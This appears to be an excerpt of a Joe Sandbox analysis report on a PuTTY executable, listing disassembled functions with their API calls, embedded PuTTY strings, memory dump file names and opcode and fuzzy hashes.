                                                          • PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00007FF738A53F58
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Text$DialogItemWindow
                                                          • String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
                                                          • API String ID: 4005798191-2223775202
                                                          • Opcode ID: 7e772465715b6861d82dd0f3126e1edd586c9725a81e8e41a119e01165285756
                                                          • Instruction ID: 33aed625facdfb40a9dec80932efa96b1702de62985c3fe740c529e2e3fa482f
                                                          • Opcode Fuzzy Hash: 7e772465715b6861d82dd0f3126e1edd586c9725a81e8e41a119e01165285756
                                                          • Instruction Fuzzy Hash: 2FF0D652F0950371FA547711E9505BCD2519FC6BE1FD44231C80D0A6D4CDBFA8C6622A
                                                          Function 00007FF738AF6B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 499c76965b417b22128af7ddef85adb1e7ea0c984cb2071aab4f6688d3a38bd2
                                                          • Instruction ID: b87695d0c333aca19951b62e24b887f9f604575997df679741206c6580a203fc
                                                          • Opcode Fuzzy Hash: 499c76965b417b22128af7ddef85adb1e7ea0c984cb2071aab4f6688d3a38bd2
                                                          • Instruction Fuzzy Hash: F2F04463A09A0351EA10AB14E855739F360EF49761FD40735C96E451E4CF3ED4499325
                                                          Function 00007FF738A84030 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FileName$OpenSave
                                                          • String ID:
                                                          • API String ID: 3193246104-0
                                                          • Opcode ID: 9cce9c2bc3f64e597b8f825aad0441e26ad99805dbc91df4869bb55238ec2463
                                                          • Instruction ID: 0d25e235dfe747ad0245266b07d01d73ae2ee99a7c9e1f352d6cfbbd2e2f9178
                                                          • Opcode Fuzzy Hash: 9cce9c2bc3f64e597b8f825aad0441e26ad99805dbc91df4869bb55238ec2463
                                                          • Instruction Fuzzy Hash: F921DA63A0FA4252F7606B24E85477AF7A0AF44750FC40230CA8D467D4EF3DEA45E229
                                                          Function 00007FF738A3BA20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$CreateLineMove
                                                          • String ID:
                                                          • API String ID: 2487549907-0
                                                          • Opcode ID: df965a00611e6bfc58505ae8152eb4b93f348e5a6ca257b903e09cf8ba18f58a
                                                          • Instruction ID: d636975ed70ea473ccdfe44ad1c663cbb232ff6e90079cc118b6d313937d0e73
                                                          • Opcode Fuzzy Hash: df965a00611e6bfc58505ae8152eb4b93f348e5a6ca257b903e09cf8ba18f58a
                                                          • Instruction Fuzzy Hash: 4111D337F0950287DB21DB26F800469E3A1EBC9FA0B448130CE1D43B44CE3DF8839614
                                                          Function 00007FF738AA74B0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$CloseEnterHandleLeave
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/handle-io.c$h && !h->u.g.moribund
                                                          • API String ID: 2394387412-953404032
                                                          • Opcode ID: 3e9f72159a42e223d6897d1c2fcd9aa8dd0c75e0c0728062b09b89a3d4e74f60
                                                          • Instruction ID: c0e1e288bb91729c05049428efac63d82c11d8ab19b0063dfbbee7cf8d7e3f49
                                                          • Opcode Fuzzy Hash: 3e9f72159a42e223d6897d1c2fcd9aa8dd0c75e0c0728062b09b89a3d4e74f60
                                                          • Instruction Fuzzy Hash: 1621B667A09642A2EB32AB15F44027AF760EB48754F840131CBCE02B90DF3EE485D359
                                                          Function 00007FF738B16FC4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                                                          • Instruction ID: d7632463577a63358ea46175f0a660b3efb2a9845b06bf8e2198821d410740f9
                                                          • Opcode Fuzzy Hash: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                                                          • Instruction Fuzzy Hash: 2011B223E58B1363F6543224D949379C0426F55764F940630EB7E4F6FECE3EA880612E
                                                          Function 00007FF738B01C08 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C27
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C46
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C6E
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C7F
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738B0320F,?,?,00000000,00007FF738B03122,?,?,?,?,?,00007FF738AED1BA), ref: 00007FF738B01C90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: c8caefee1c78adc6cc2a832ec0a8ff3792627e9dc09bb3095b918bdbd87bd148
                                                          • Instruction ID: 79032135e741e6d16a2f901578e17f3227b7924b5eb82f547376134e0214f5b0
                                                          • Opcode Fuzzy Hash: c8caefee1c78adc6cc2a832ec0a8ff3792627e9dc09bb3095b918bdbd87bd148
                                                          • Instruction Fuzzy Hash: 5A11AFA2E0C20361FA6CB321565197DE1429F443A0FD44734E43D4A7E6DF7EE88A622F
                                                          Function 00007FF738B01A9C Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01AAD
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01ACC
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01AF4
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01B05
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01B16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 6bf687c1edb8c7d0d239e61b0dd02aac6f82c614fe3eb266b0f273a4c800701b
                                                          • Instruction ID: f8be295a3c0398053e8848b328bd5da274b5b91dfdfe71e4e934b6398e739029
                                                          • Opcode Fuzzy Hash: 6bf687c1edb8c7d0d239e61b0dd02aac6f82c614fe3eb266b0f273a4c800701b
                                                          • Instruction Fuzzy Hash: 86111CA2A0950761FA6CB261546297DD2464F41360FD80734E53D462E2EF3FB84A623B
                                                          Function 00007FF738B0AFDC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                          • API String ID: 3215553584-1196891531
                                                          • Opcode ID: 1be7b1efe40a33ba18a595fcdd4d053b0733aa869be65a09c6fe4d55339440b4
                                                          • Instruction ID: 2c66b819ebef2fa33cae9db9cc213e20c7cde0944d4e084fa59e784133ac93d0
                                                          • Opcode Fuzzy Hash: 1be7b1efe40a33ba18a595fcdd4d053b0733aa869be65a09c6fe4d55339440b4
                                                          • Instruction Fuzzy Hash: E781A2B3E18203A5F6656F258110A3EEAA0AF1174CFD58035CA2D57295DF3FB801B32B
                                                          Function 00007FF738B0AD18 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                          • API String ID: 3215553584-1196891531
                                                          • Opcode ID: e3481ef9aec6e78ed2a1b8eb5a6bb2e99a88962ad6cbc2fa58b633ec77e900ec
                                                          • Instruction ID: ee13fee261536d85787e4104c6e2733ad32dc493f98d1c56b4ce1bcb620fccf8
                                                          • Opcode Fuzzy Hash: e3481ef9aec6e78ed2a1b8eb5a6bb2e99a88962ad6cbc2fa58b633ec77e900ec
                                                          • Instruction Fuzzy Hash: 4281B5E3D0C203E5F6656A288554A7DEA909F11744FF4A831C53A826D5CB3FA809B72B
                                                          Function 00007FF738A53CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$MessageSend$ClientDesktopDialogIconLoadLongMoveShowText
                                                          • String ID: Main
                                                          • API String ID: 2039525433-521822810
                                                          • Opcode ID: 8c1771a4ca4f45391abdf4efa7b50b6c01b83754658402581b21757466e65035
                                                          • Instruction ID: 2049ae36507c82fdb2369bdfe5fa88f1b30cc27f00649a1b9545877827837c32
                                                          • Opcode Fuzzy Hash: 8c1771a4ca4f45391abdf4efa7b50b6c01b83754658402581b21757466e65035
                                                          • Instruction Fuzzy Hash: 0651F67370960262EB20BB12E450ABAE790EBC9BD4FC04235DE8D47B85DF7EE1419714
                                                          Function 00007FF738AD97A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF738AD9843
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: %02x$CryptProtectMemory$crypt32.dll
                                                          • API String ID: 190572456-4241872374
                                                          • Opcode ID: d96700e70e03d59c02360c032b61d41d4cff819394462cb36d846765773851ff
                                                          • Instruction ID: d6a1172d64743d714ea9eedc10b8607649a9e3fd8208e8e53acbbd98c5f770f8
                                                          • Opcode Fuzzy Hash: d96700e70e03d59c02360c032b61d41d4cff819394462cb36d846765773851ff
                                                          • Instruction Fuzzy Hash: 26419E53F0E643A2FA10BB26E860779E391AF45BC0FC48031C94D57796DE3EE44AA325
                                                          Function 00007FF738AFA0EC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/utils/memory.c$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
                                                          • API String ID: 1949149715-10101066
                                                          • Opcode ID: abf45a9388cfe587ab4a5c3f8130fcb99dc74afbfdbe66ab30136296657ee0b7
                                                          • Instruction ID: 6f9950364efab483cab89c514e9231d9ab1f65e7338d88827f87fb8b4bd8b98c
                                                          • Opcode Fuzzy Hash: abf45a9388cfe587ab4a5c3f8130fcb99dc74afbfdbe66ab30136296657ee0b7
                                                          • Instruction Fuzzy Hash: 98212D73B1E58295F720B712A840ABAE254EF44FC8FA44132EF4D47B99CE3DE5419718
                                                          Function 00007FF738A647E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: BreakClearCloseCommHandle
                                                          • String ID: End of file reading from serial device$Error reading from serial device
                                                          • API String ID: 2685284230-2629609604
                                                          • Opcode ID: 272a985d1a52f2dda5794481ab6d1bdd34a2e60b04609d1b9940c24dc2b7c133
                                                          • Instruction ID: a82915bfdccd8da43919a2fca1795457dd0164cdccc74bac9c7b623bb9006910
                                                          • Opcode Fuzzy Hash: 272a985d1a52f2dda5794481ab6d1bdd34a2e60b04609d1b9940c24dc2b7c133
                                                          • Instruction Fuzzy Hash: D121A323A06A4691EA21BB16E44077AE760AB84BF0F844331CFAE07BD5DF3DE4419350
                                                          Function 00007FF738A72FD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
